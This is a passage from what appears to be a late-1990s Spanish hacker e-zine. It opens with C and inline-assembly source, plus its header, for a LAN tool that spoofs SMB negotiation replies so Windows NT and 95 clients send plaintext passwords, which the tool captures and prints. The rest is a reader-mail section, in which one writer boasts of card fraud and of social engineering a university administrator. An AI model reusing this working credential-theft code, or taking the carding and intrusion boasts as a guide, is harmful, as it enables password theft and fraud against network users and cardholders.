  5502. ECBData->x.RAW.buf[75]=3d0x00; 
  5503. ECBData->x.RAW.buf[76]=3d0x00; 
  5504. ECBData->x.RAW.buf[77]=3d0x00; 
  5505. ECBData->x.RAW.buf[78]=3d0x00; 
  5506. ECBData->x.RAW.buf[79]=3d0x00; 
  5507. ECBData->x.RAW.buf[80]=3d0x00; 
  5508. ECBData->x.RAW.buf[81]=3d0x00; 
  5509. ECBData->x.RAW.buf[82]=3d0x00; 
  5510. ECBData->x.RAW.buf[83]=3d0x00; 
  5511. ECBData->x.RAW.buf[84]=3d0x00; 
  5512. ECBData->x.RAW.buf[85]=3d0x00; 
  5513. ECBData->x.RAW.buf[86]=3d0x00; 
  5514. ECBData->x.RAW.buf[87]=3d0x00; 
  5515. ECBData->x.RAW.buf[88]=3d0x00; 
  5516. ECBData->x.RAW.buf[89]=3d0x00; 
  5517. ECBData->x.RAW.buf[90]=3d0x00; 
  5518. ECBData->x.RAW.buf[91]=3d0x00; 
  5519. ECBData->x.RAW.buf[92]=3d0x00; 
  5520. ECBData->x.RAW.buf[93]=3d0x00; 
  5521. ECBData->x.RAW.buf[94]=3d0x00; 
  5522. ECBData->x.RAW.buf[95]=3d0x00; 
  5523. ECBData->x.RAW.buf[96]=3d0x00; 
  5524. ECBData->x.RAW.buf[97]=3d0x00; 
  5525. ECBData->x.RAW.buf[98]=3d0x00; 
  5526. ECBData->x.RAW.buf[99]=3d0x00; 
  5527. ECBData->x.RAW.buf[100]=3d0x00; 
  5528. ECBData->x.RAW.buf[101]=3d0x00; 
  5529. ECBData->x.RAW.buf[102]=3d0x00; //last byte 
  5530. ECBData->x.RAW.buf[103]=3d0x01; 
  5531.  
  5532. // Setup some of the variables that we'll use later 
  5533. foundpw=3d0; 
  5534. sendOK=3d0; 
  5535. wstype=3d0; 
  5536.  
  5537. do 
  5538. do 
  5539. // Loop until someone hits a key or until we have a packet to 
  5540. process 
  5541. if(kbhit()) 
  5542. printf("C2MyAzz: Exiting\n"); 
  5543. uninit(); 
  5544. exit(0); 
  5545. } while (CurEntry =3d=3d 0); //Loop until we get a packet 
  5546.  
  5547. // Grab data out of packet to determine whether or not to proceed 
  5548. type =3d (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode); 
  5549. commandresp =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp); 
  5550.  
  5551. // NT and 95 use different username / password combinations. Check 
  5552. // to see if the client is a 95 or NT workstation. Note that we're checking 
  5553. // to see if the workstation supports long filenames (0x3 =3d NT), or DOS 
  5554. // 8.3 only (0x0 =3d 95). This is an assumption based on observation. We 
  5555. // could use additional information in the packet to determine NT or 95.. 
  5556.  
  5557. if((((IPpac *)(Data[0].data))->x.SMB.Flags2) =3d=3d 0x3) 
  5558. wstype=3d1; // Looks like an NT Workstation 
  5559. else 
  5560. wstype=3d0; // Otherwise, a Windows 95 machine 
  5561.  
  5562. // If this is a SMB NEG PROT and this is a request, grab information 
  5563. // for the transmit ECB 
  5564. if((type =3d=3d 0x72) && (!(commandresp & 0x80))) 
  5565. SourceAddress=3d(u32)(((IPpac *)(Data[0].data))->srcaddr); 
  5566. DestAddress=3d(u32)(((IPpac *)(Data[0].data))->destaddr); 
  5567. sourcePort=3d(u16)(((IPpac *)(Data[0].data))->srcport); 
  5568. destPort=3d(u16)(((IPpac *)(Data[0].data))->destport); 
  5569. seqNum=3d(u32)(((IPpac *)(Data[0].data))->seqnumber); 
  5570. ackNum=3d(u32)(((IPpac *)(Data[0].data))->acknumber); 
  5571. MuxID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId); 
  5572. TreeID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID); 
  5573. ProcID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID); 
  5574. pktlen =3d (u16) (((IPpac *)(Data[0].data))->length); 
  5575. memmove(&pid, &Data[0].pid, sizeof(PID)); 
  5576. memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr)); 
  5577. memmove(XmitECB.ImmAddr, (void *) immAddr, 6); 
  5578. memmove(&XmitECB.ProtocolID, &pid, sizeof(PID)); 
  5579. *((u32 *)(&(ECBData->destaddr)))=3dSourceAddress; 
  5580. *((u32 *)(&(ECBData->srcaddr)))=3dDestAddress; 
  5581. *((u16 *)(&(ECBData->destport)))=3dsourcePort; 
  5582. *((u16 *)(&(ECBData->srcport)))=3ddestPort; 
  5583. *((u32 *)(&(ECBData->seqnumber)))=3dackNum; 
  5584. *((u16 *)(&(ECBData->x.RAW.buf[24])))=3dTreeID; 
  5585. *((u16 *)(&(ECBData->x.RAW.buf[26])))=3dProcID; 
  5586. *((u16 *)(&(ECBData->x.RAW.buf[30])))=3dMuxID; 
  5587.  
  5588. if(wstype =3d=3d 1) 
  5589. ECBData->x.RAW.buf[33]=3d0x05; //NT Workstation uses dialect 5 
  5590. else 
  5591. ECBData->x.RAW.buf[33]=3d0x02; //95 Workstation uses dialect 2 
  5592.  
  5593. // Need to calculate the IP and TCP headers. Start by setting up for 
  5594. // grabbing the sequence numbers of the previous packets, and ca 
  5595. seqNum=3dflipbyte32(seqNum); 
  5596. pktlen=3dflipbyte16(pktlen); 
  5597.  
  5598. // Ack number is last packet + data - header 
  5599. nextseqNum=3d(seqNum + pktlen - 40); 
  5600. nextseqNum=3dflipbyte32(nextseqNum); 
  5601. *((u32 *)(&(ECBData->acknumber)))=3dnextseqNum; 
  5602. seqNum=3dflipbyte32(seqNum); 
  5603. pktlen=3dflipbyte16(pktlen); 
  5604.  
  5605. // Calculate the IP and TCP checksums 
  5606. // Initially set the CRCs to zero 
  5607. ECBData->headerCRC=3d0x0000; 
  5608. ECBData->tcpCRC=3d0x0000; 
  5609. sum=3d0; 
  5610.  
  5611. // Start by adding up all the bytes in IP header 
  5612. ptr=3d(u16 *)ECBData; 
  5613. for(j=3d0;j<10;j++) 
  5614. sum+=3d(ptr[j]); 
  5615.  
  5616. // Add any overflow into the sum 
  5617. sum=3d(sum>>16)+(sum & 0xffff); 
  5618. sum+=3d(sum>>16); 
  5619. // Take 1's complement 
  5620. ECBData->headerCRC=3d~sum; 
  5621.  
  5622. // Calculate the TCP Checksum 
  5623. // Note that we need to first create a pseudo-header for 
  5624. // use in the TCP checksum. For more information, see page 
  5625. // 186 of "Internetworking with TCP/IP" by Comer 
  5626. sum=3d0; // Clear sum from last calculation 
  5627. sum+=3dptr[6]; // Add up the IP address 
  5628. sum+=3dptr[7]; 
  5629. sum+=3dptr[8]; 
  5630. sum+=3dptr[9]; 
  5631. sum+=3d0x0600; // Add in the protocol ID for TCP in IP 
  5632. sum+=3d0x5400; // Add in the length of TCP data 
  5633. for(j=3d10;j<74;j++) // Add up the bytes in the ECB 
  5634. sum+=3d(ptr[j]); 
  5635.  
  5636. // Add any overflow into the sum 
  5637. sum=3d(sum>>16)+(sum & 0xffff); 
  5638. sum+=3d(sum>>16); 
  5639.  
  5640. // Take 1's complement 
  5641. ECBData->tcpCRC=3d~sum; 
  5642.  
  5643.  
  5644. if((foundpw =3d=3d 0) && (sendOK =3d=3d 0)) 
  5645. // SendOK is reset after the packet is sent 
  5646. sendOK=3d1; 
  5647. // Pass the ECB to LSL for a raw send 
  5648. _asm 
  5649. push es 
  5650. push ds 
  5651. mov ax, SEG XmitECB 
  5652. mov es, ax ;Whew! Lots of work just to get 
  5653. mov si, OFFSET XmitECB ;a packet on the wire. 
  5654. mov bx, 0ch ;Let's transmit this tiresome 
  5655. hag 
  5656. call far ptr LSLProtocolSupportEntryPt 
  5657. mov ComCode, ax 
  5658. pop ds 
  5659. pop es 
  5660. else 
  5661. foundpw=3d0; 
  5662. } // End of packet send routine 
  5663.  
  5664. // If we've received the client's password, display it on the screen 
  5665. if(type =3d=3d 0x73) 
  5666. memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32); 
  5667. memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15); 
  5668. pwlen =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength); 
  5669.  
  5670. // Since the password could be null, check to see if it appears 
  5671. // to be a valid password. Is the first character of the password 
  5672. // a valid ASCII character? 
  5673. if((password[0] >=3d 0x21) && (password[0] <=3d 0x5D)) 
  5674. // If we spoof every packet, we won't connect to IPC to find the 
  5675. // shares of the domain. By spoofing every other packet, we'll let 
  5676. // the connection go through after a retry. This approach will 
  5677. // present the user with an error screen after attempting to connect 
  5678. // to the doamin, but if the user retries, we'll backoff and let 
  5679. // the user through 
  5680. foundpw=3d1; 
  5681. if(wstype =3d=3d 1) 
  5682. printf("User %s password is %s\n",&password[strlen(password)+1], 
  5683. password); 
  5684. else 
  5685. // Need to null terminate the strings 
  5686. password[23]=3d0x00; 
  5687. username[15]=3d0x00; 
  5688. printf("User %s password is %s\n", username, password); 
  5689. } // End of password display routine 
  5690.  
  5691. // Now that we've processed the packet, clear the buffer of the processed 
  5692. // packet. Note that we're disabling interrupts because we might 
  5693. // get stomped with a new packet while we're clearing out the old packet 
  5694.  
  5695. _disable(); 
  5696. memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo))); 
  5697. CurEntry--; 
  5698. _enable(); 
  5699.  
  5700. } while (1); 
  5701.  
  5702. ------------ FIN -------------------------------------------------------------
  5703.  
  5704.         Ahora te pongo el .h 
  5705.  
  5706. ------------ Codigo Fuente ---------------------------------------------------
  5707.  
  5708. // 
  5709. // 
  5710. // 
  5711.  
  5712. #define flipbyte32( x ) ((u32) \ 
  5713. ((((u32)(x) & 0x000000FFL) << 24) | \ 
  5714. (((u32)(x) & 0x0000FF00L) << 8) | \ 
  5715. (((u32)(x) & 0x00FF0000L) >> 8) | \ 
  5716. (((u32)(x) & 0xFF000000L) >> 24))) 
  5717.  
  5718. #define flipbyte16( x ) ((u16) \ 
  5719. ((((u16)(x) & 0x00FF) << 8) | \ 
  5720. (((u16)(x) & 0xFF00) >> 8))) 
  5721.  
  5722. typedef signed char s8; 
  5723. typedef unsigned char u8; 
  5724. typedef unsigned int u16; 
  5725. typedef long unsigned int u32; 
  5726.  
  5727. typedef struct 
  5728. { u32 lo; 
  5729. u32 hi; 
  5730. } u64; 
  5731.  
  5732. typedef struct 
  5733. { u8 addr [8]; 
  5734. } Addr; 
  5735.  
  5736. typedef struct 
  5737. { u8 ID[6]; 
  5738. } PID; 
  5739.  
  5740. typedef u32 ProtocolNumber; 
  5741.  
  5742. typedef enum 
  5743. { ODI_SUCCESS =3d 0, 
  5744. ODI_OUT_OF_RESOURCES =3d -119, 
  5745. ODI_NO_MORE_ITEMS =3d -122, 
  5746. ODI_FAIL =3d -124 
  5747. } ODIStat; 
  5748.  
  5749. typedef enum 
  5750. { FIRST_MUST, 
  5751. FIRST_NEXT, 
  5752. LOAD_DEPENDS, 
  5753. LAST_NEXT, 
  5754. LAST_MUST, 
  5755. } CHNPOS; 
  5756.  
  5757. typedef struct 
  5758. u8 version; 
  5759. u8 type; 
  5760. u16 length; 
  5761. u16 identification; 
  5762. u16 flags1; 
  5763. u8 ttl; 
  5764. u8 protocol; 
  5765. u16 headerCRC; 
  5766. u32 srcaddr; 
  5767. u32 destaddr; 
  5768.  
  5769. //Start TCP Header 
  5770.  
  5771. u16 srcport; 
  5772. u16 destport; 
  5773. u32 seqnumber; 
  5774. u32 acknumber; 
  5775. u8 dataOffset; 
  5776. u8 flags2; 
  5777. u16 window; 
  5778. u16 tcpCRC; 
  5779. u16 pad1; 
  5780.  
  5781. //Start NB Header 
  5782.  
  5783. u8 nbtype; 
  5784. u8 nbflags; 
  5785. u16 nblength; 
  5786.  
  5787. union 
  5788. struct 
  5789. u8 Reserved0; 
  5790. u8 IDString[3]; 
  5791. u8 FunctionCode; 
  5792. u8 Reserved1[4]; 
  5793. u8 Flags1; 
  5794. u16 Flags2; 
  5795. u8 Reserved2[12]; 
  5796. u16 TreeID; 
  5797. u16 ProcessID; 
  5798. u16 Reserved3; 
  5799. u16 muxId; 
  5800. } SMB; 
  5801. struct 
  5802. u8 buf[32]; 
  5803. } RAW; 
  5804. struct 
  5805. u8 reserved1[9]; 
  5806. u8 cmdresp; 
  5807. u8 reserved[43]; 
  5808. u8 pwlength; 
  5809. u8 reserved2; 
  5810. u8 password[32]; 
  5811. }USERPWNT; 
  5812. struct 
  5813. u8 reserved1[9]; 
  5814. u8 cmdresp; 
  5815. u8 reserved[43]; 
  5816. u8 pwlength; 
  5817. u8 reserved2; 
  5818. u8 password[24]; 
  5819. u8 username[16]; 
  5820. }USERPW95; 
  5821. } x; 
  5822.  
  5823. } IPpac; 
  5824.  
  5825. // template for Info Block 
  5826.  
  5827. typedef u32 Func; 
  5828.  
  5829. typedef struct 
  5830. void (_far * LSLAPI )(); 
  5831. void (_far * GSAPI )(); 
  5832. void (_far * MLIDAPI)(); 
  5833. } InfoBlock; 
  5834.  
  5835. // template for info copied from IP packet 
  5836.  
  5837. typedef struct 
  5838. u8 immAddr[6]; 
  5839. u8 type; 
  5840. u16 size; 
  5841. PID pid; 
  5842. char data[1500]; 
  5843. } IPInfo; 
  5844.  
  5845. typedef struct ECBs 
  5846. void _far * NxtECB; 
  5847. void _far * PreECB; 
  5848. u16 Status; 
  5849. void (_far * ECBISR)(); 
  5850. u16 ProtocolNum; 
  5851. u8 ProtocolID[6]; 
  5852. u16 BoardNum; 
  5853. u8 ImmAddr[6]; 
  5854. u8 ECBDrvrWkSpace[4]; 
  5855. u16 ECBPrtclWkSpace[4]; 
  5856. u16 DataLen; 
  5857. u16 FragCnt; 
  5858. u8 _far * Frag1Addr; 
  5859. u16 Frag1Len; 
  5860. } EventCB; 
  5861.  
  5862. typedef struct 
  5863. u8 _far * MediaHdr; // 4 
  5864. u8 _far * DataPtr; // 4 
  5865. u16 DataLen; // 2 
  5866. PID ProtocolID; // 6 
  5867. u16 BoardNum; // 2 
  5868. u16 DataSize; // 2 
  5869. PID ImmAddr; // 6 
  5870. u16 PacAttrib; // 2 
  5871. u16 DestType; // 2 
  5872. u16 StartOffset; // 2 
  5873. u8 PriorityLvl; // 1 
  5874. u8 Reserved; // 1 
  5875. } LookAhead; 
  5876.  
  5877. typedef struct RxChainNode 
  5878. u32 nextlink; // 4 
  5879. u16 boardnum; // 2 
  5880. u16 position; // 2 
  5881. void (_far _loadds * ISR)(); // 4 
  5882. void (_far * ControlEntryPt)(); // 4 
  5883. u16 StackID; // 2 
  5884. u16 PacFilterMsk; // 2 
  5885. u32 Reserved; // 4 
  5886. } RxNode; // 24 total 
  5887.  
  5888. typedef struct 
  5889. u8 cmajver; 
  5890. u8 cminver; 
  5891. u32 longname; 
  5892. u32 shortname; 
  5893. u8 pmajver; 
  5894. u8 pminver; 
  5895. u8 reserved[16]; 
  5896. } configtbl; 
  5897.  
  5898. typedef struct 
  5899. u8 majver; 
  5900. u8 minver; 
  5901. u16 ctr; 
  5902. u32 mask; 
  5903. u32 txpac; 
  5904. u32 rxpac; 
  5905. u32 nopac; 
  5906. u16 cusctr; 
  5907. } stattbl; 
  5908.  
  5909. ------------ FIN -------------------------------------------------------------
  5910.  
  5911.   Bueno os dejo, por hoy, si por alguna casualidad un dia me apetece, 
  5912.   mandare otro texto del nbtstat, explicandolo que protocolos hay que 
  5913.   tener instalados, etc. 
  5914.  
  5915.   ad10. 
  5916.  
  5917.   P.D. Por problemas tecnicos hemos tenido que quitar la pagina, por lo 
  5918.   cual estamos buscando nuevo server, aunque seguro que cogamos un dominio 
  5919.   propio. Ya que para septiembre cambianos totalmente la pagina. 
  5920.  
  5921.  
  5922.   {CyBoRg} -thPrOpHeT- 
  5923.   SHG Security Group 
  5924.  
  5925.   <------>
  5926.  
  5927.   [ Lastima lo del web y esperamos oir de vosotros pronto y a ver si te
  5928.     animas y nos escribes algo ;-) ]
  5929.  
  5930. <────────────────────────────────────────────────────────────────────────────>
  5931.  
  5932.   From:  "Angel" <r9r99@xxxxxxxxxxxxxx>      
  5933.   Subject:  Hola  
  5934.  
  5935.   Estoy realizando un proyecto sobre virus que explicara 
  5936.   como funcionan, con todo detalle en todas las plataformas 
  5937.   existentes, 
  5938.   os agradeceria cualquier tipo de informacion al respecto (en 
  5939.   español), si teneis algo, sea lo que sea, por favor mandarmelo a: 
  5940.  
  5941.   r9r99@xxxxxxxxxxxxxx 
  5942.  
  5943.   Muchas gracias. En cuanto lo tenga terminado os lo enviare 
  5944.   por si quereis publicarlo. 
  5945.  
  5946.   <------>
  5947.  
  5948.   [ Pasate por nuestra seccion de VIRUS, que te sera muy util, y ya sabes
  5949.     estamos esperando tu articulo de virus. ]
  5950.  
  5951. <────────────────────────────────────────────────────────────────────────────>
  5952.  
  5953.   From:  Usuari Escombra <ko@xxxxxxxxxxxxxx>
  5954.   To:  jjf_team@usa.net  
  5955.   Subject:  quiero colaborar  
  5956.  
  5957.   Holas... me encanta vuestro e-zine... especialmete el 3 y el 4... 
  5958.   porque el 1 es... como lo diriamos... un poco verde... pero de buen 
  5959.   rollo..! 
  5960.   Os escribo desde Barcelona.. (Spain) jajaja... pq aqui el tema esta muy 
  5961.   candente... mi seudonimo es NoFace aunque este es nuevo ya que antes yo 
  5962.   me hacia llamr NEXUS... sip uno de tantos pero quizas uno de los 
  5963.   primeros... Tengo alguna experiencia en hackear sistemas Unix... 
  5964.   y soy especialista en MACINTOSH... en eso no hay quien me gane aunque no 
  5965.   pude superar el reto de Apple para hackear su pagina... me preguntaba si 
  5966.   podria formar parte en la revista... Ah.. domino bastante de Carding 
  5967.   algo me he sacado con las Visas y poseo el secreto de generar numeros 
  5968.   con PELAS a partir de algun numero ya caducado.. me lo ensenyo un 
  5969.   coleguilla que controla mucho... Me ofrezco a redactar todo tipo de 
  5970.   articulos... de tema que sea escepto de Telefonia que poseo un 
  5971.   conocmiento limitado... 
  5972.   Opino que el Hack es uan forma de vida y como no una forma de pensar... 
  5973.   Gracias y espero que me escribais. Diciendome si colaboro o no..? OK 
  5974.   Venga animo y seguid asi que soys cojonudos e id con cuidado... EL GRAN 
  5975.   HERMANO OS OBSERVA jejeje.. bueno os escribo desde la universidad POMPEU 
  5976.   FABRA.. jeje infiltrado... jejej.... A ver si no me pillan un dia de 
  5977.   estos... una vez me pillaron Intentando hackaer el server central... y 
  5978.   me quede con el admin... jeje INGENIERIA SOCIAL... 
  5979.   - no, mi crnet.. mmmm me lo he dejado en casa... 
  5980.   _ no puedes estar aqui sin carnet... por cierto que haces.. ?? 
  5981.   _ Nada... nada... 
  5982.   _ Fuera.. 
  5983.   _ y tu quien eres...?? 
  5984.   _ el admin.. 
  5985.   (cara de superioridad) 
  5986.   _ A si? pues ensenyame el carnet ... (jejeje) 
  5987.   _ ahora voy a buscarlo... pa chulo yo... 
  5988.   (NoFace desaparece.. jejeje) anda buscame 
  5989.  
  5990.   Bueno SALUDOS....... HACK THE WORLD IS FUCK THE WORLD 
  5991.  
  5992.   XnexusX@xxxxxxxxxxxxxx <---- Ismael del servidor.. jejeervidor.. jeje 
  5993.  
  5994.   <------>
  5995.  
  5996.   [ Pues los mienbros de la revista son los componentes de - J.J.F. / HACKERS
  5997.     TEAM - y es un grupo cerrado. Pero por supuesto puedes escribir lo que
  5998.     quieras que nosotros te lo ponemos encantados :) ]
  5999.  
  6000. <────────────────────────────────────────────────────────────────────────────>
  6001.  
  6002.   From:  Manuel-el oso <sambam@xxxxxxxxxxxxxx>
  6003.   To:  sambam@xxxxxxxxxxxxxx  
  6004.   Subject:  el indio piel roja....  
  6005.  
  6006.   La historia nos recuerda que en cierta ocasion el 
  6007.   presidente de los Estados Unidos intento comprar 
  6008.   el territorio ocupado por los indios. Para ello le hizo 
  6009.   una proposicion al jefe indio "toro sentado". 
  6010.   Y esta fue su respuesta: 
  6011.  
  6012.   *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ 
  6013.  
  6014.   CARTA DEL JEFE INDIO 
  6015.  
  6016.         ¿Como se puede comprar o vender el firmamento, ni aun el calor de la
  6017.   tierra?. Dicha idea nos es desconocida. Si no somos dueños de la frescura
  6018.   del aire ni del fulgor de las aguas ¿Como podrian ustedes comprarlos? Cada
  6019.   parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de
  6020.   pino, cada grano de arena de las playas, cada gota de rocio en los oscuros
  6021.   bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la
  6022.   memoria y al pasado de mi pueblo. La savia que circula por las venas de los
  6023.   robles lleva consigo las memorias de los pieles rojas.
  6024.         Los muertos del hombre blanco olvidan su pais de origen cuando
  6025.   emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca
  6026.   pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles
  6027.   rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las
  6028.   flores perfumadas son nuestras hermanas; el venado, el caballo, la gran
  6029.   guila; estos son nuestros hermanos. Las escarpadas peñas, los humedos
  6030.   prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a
  6031.   la misma familia. 
  6032.  
  6033.         Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje 
  6034.   de que quiere comprar nuestras tierras dice que nos reservar un lugar en el 
  6035.   que podamos vivir confortablemente entre nosotros. El se convertir en
  6036.   nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de
  6037.   comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada
  6038.   para nosotros. 
  6039.         El agua cristalina que corre por los rios y arroyuelos no es
  6040.   solamente agua, sino, tambien, representa la sangre de nuestros antepasados.
  6041.   Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez
  6042.   deben enseñar a sus hijos que es sagrada y cada reflejo fantasmagorico en
  6043.   las claras aguas de los lagos cuenta los sucesos y memorias de las vidas
  6044.   de nuestras gentes. El murmullo del agua es la voz del padre de mi padre. 
  6045.         Los rios son nuestros hermanos y sacian nuestra sed; son portadores de 
  6046.   nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
  6047.   tierras, ustedes deben recordar y enseñarles a sus hijos que los rios son
  6048.   nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos
  6049.   con la misma dulzura con la que se trata a un hermano. Sabemos que el
  6050.   hombre blanco no comprende nuestro modo de vida. El no sabe distinguir
  6051.   entre un pedazo de tierra y otro, ya que es un extraño que llega de noche y
  6052.   toma de la tierra lo que necesita.
  6053.         La tierra no es su hermana, sino su enemiga, y una vez conquistada
  6054.   sigue su camino, dejando atras la tumba de sus padres sin importarle. Le
  6055.   secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus
  6056.   padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la
  6057.   tierra, y a su hermano, el firmamento, como objetos que se compran, se
  6058.   explotan y se venden como ovejas o piedras de colores. Su apetito devorar
  6059.   la tierra, dejando atras solo un desierto. 
  6060.         No se, pero nuestro modo de vida es diferente al de ustedes. La sola 
  6061.   visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por 
  6062.   que el piel roja es un salvaje y no comprende nada. 
  6063.         No existe un lugar tranquilo en las ciudades del hombre blanco, ni
  6064.   hay sitio donde escuchar como se abren las hojas de los arboles en primavera
  6065.   o como aletean los insectos. Pero quiza tambien esto debe ser porque soy 
  6066.   un salvaje que no comprende nada. El ruido solo parece insultar nuestros 
  6067.   oidos. Y despues de todo, ¿para que sirve la vida si el hombre no puede 
  6068.   escuchar el grito solitario del chotacabras ni las discusiones nocturnas de 
  6069.   las ranas al borde de un estanque?. Soy un piel roja y nada entiendo. 
  6070.         Nosotros preferimos el suave susurro del viento sobre la superficie de
  6071.   un estanque, asi como el olor de ese mismo viento purificado por la lluvia
  6072.   del mediodia o perfumado con aromas de pinos. El aire tiene un valor
  6073.   inestimable para el piel roja, ya que todos los seres comparten un mismo
  6074.   aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El
  6075.   hombre blanco no parece consciente del aire que respira; como un moribundo
  6076.   que agoniza durante muchos dias es insensible al olor. Pero si les vendemos
  6077.   nuestras tierras, deben recordar que el aire nos es inestimable, que el
  6078.   aire comparte su espiritu con la vida que sostiene. El viento que dio a
  6079.   nuestros abuelos el primer soplo de vida tambien recibe sus ultimos
  6080.   suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas
  6081.   como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco
  6082.   pueda saborear el viento perfumado por las flores de las praderas. 
  6083.         Por ello, consideramos su oferta de comprar nuestras tierras y si
  6084.   decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a
  6085.   los animales de esta tierra como a sus hermanos. Soy un salvaje y no
  6086.   comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las
  6087.   praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy
  6088.   un salvaje y no comprendo como una maquina humeante puede importar mas que
  6089.   el bufalo, al que nosotros solo matamos para sobrevivir 
  6090.         ¿Que seria del hombre sin los animales? Si todos fueran exterminados,
  6091.   el hombre moriria de una gran soledad espiritual; porque lo que suceda a
  6092.   los animales tambien le sucedera al hombre, todo va enlazado. Deben
  6093.   enseñarles a sus hijos que el suelo que pisan son las cenizas de nuestros
  6094.   abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas
  6095.   de nuestros semejantes a fin que sepan respetarla. Enseñen a sus hijos que
  6096.   nosotros hemos enseñado a los nuestros que la tierra es nuestra madre; y
  6097.   que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra.
  6098.   Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos:
  6099.   la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto
  6100.   sabemos: todo va enlazado, como la sangre que une una familia. Todo va
  6101.   enlazado.
  6102.         El hombre no tejio la trama de la vida; el solo es un hijo. Lo que
  6103.   hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo
  6104.   Dios pasea y habla con el de amigo a amigo, queda exento del destino comun.
  6105.   Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que
  6106.   quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios.
  6107.   Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que
  6108.   nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los
  6109.   hombres y su compasion se comparte por igual entre el piel roja y el hombre
  6110.   blanco. Esta tierra tiene un valor inestimable para El, y si se daña se
  6111.   provocaria la ira del Creador.
  6112.         Tambien los blancos se extinguiran, quiza antes que las demas tribus. 
  6113.   Contaminan sus lechos y una noche pereceran ahogados en sus propios
  6114.   residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria,
  6115.   inspirados por la fuerza de Dios que os trajo a esta tierra y que, por
  6116.   algun designio especial, les dio dominio sobre ella y sobre el piel roja.
  6117.   Ese destino es un misterio para nosotros, pues no entendemos por que se
  6118.   exterminan los bufalos, se doman los caballos salvajes, se saturan los
  6119.   rincones secretos de los bosques con el aliento de tantos hombres y se
  6120.   atiborra el paisaje de las exuberantes colinas con cables parlantes. ¿Donde
  6121.   esta el matorral? Destruido.
  6122.         ¿Donde esta el aguila? Desaparecio.Termina la vida y empieza la
  6123.   supervivencia.
  6124.  
  6125.  "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y 
  6126.   debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas 
  6127.   ortograficas" Colaboracion por Pata. 
  6128.  
  6129.   *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ 
  6130.  
  6131.   <------>
  6132.  
  6133.   [ hhhhuuumm interesante, pero, ¿ que es ? ]
  6134.  
  6135. <────────────────────────────────────────────────────────────────────────────>
  6136.  
  6137.   From:  "Tono" <cmaragon@xxxxxxxxxxxxxx>
  6138.   Subject:  Info  
  6139.  
  6140.   Me gustaria que me dijeseis las IP de la web de LEOWORLD ya que actualmente
  6141.   esta con otra IP de la que vosotros habeis puesto.
  6142.   Y tambien si vosotros haceis lo mismo qie me dijeseis las IP por las que
  6143.   soleis poner vuestra web.
  6144.   NOTA: si no cambiais la IP olvidad lo 2nd 
  6145.  
  6146.   vuestra pagina es la mejor que he encontrado en español , asi que no la
  6147.   jodais, y lo que mas me ha gustado ha sido el simbolo "phi"  de la seccion
  6148.   de Crack.
  6149.  
  6150.   Stop..................... 
  6151.  
  6152.   <------>
  6153.  
  6154.   [ ¿¿¿ La IP de LEOWORLD ???, y nosotros no cambiamos y si lo hacemos no te
  6155.     preocupes que te enteraras :) ]
  6156.  
  6157. <────────────────────────────────────────────────────────────────────────────>
  6158.  
  6159.   From:  default <default@xxxxxxxxxxxxxx>
  6160.   To:  jjf_team@usa.net  
  6161.   Subject:  hola desde el peru  
  6162.  
  6163.   Que tal amigos me parece que estan haciendo un buen trabajo pero diganme
  6164.   como seria posible que yo pudiera adquirir un ejemplar 
  6165.   respuestas al 
  6166.   hepe@xxxxxxxxxxxxxx 
  6167.  
  6168.   <------>
  6169.  
  6170.   [ Thx pero logicamente en nuestro web oficial y en nuestros distribuidores
  6171.     oficiales. ]
  6172.  
  6173. <────────────────────────────────────────────────────────────────────────────>
  6174.  
  6175.   From:  "Juan Carlos" <j.tortola@xxxxxxxxxxxxxx>
  6176.   Subject:  ezine para Conde Vampiro y Mac Crack Bishop  
  6177.  
  6178.   Bueno tios el ezine es una pasada, desde luego estoy aprendiendo un huevo y
  6179.   parte del otro. A pesar de que soy un newbie, tengo ganas de comenzar en
  6180.   esto del mundo hack. Estoy realizando un generador de password aleatorio y
  6181.   con diccionario para claves de NT 4. Estas estan encriptadas con hash MD4 y
  6182.   necesito el codigo fuente de este algoritmo. Tambien necesito saber algo
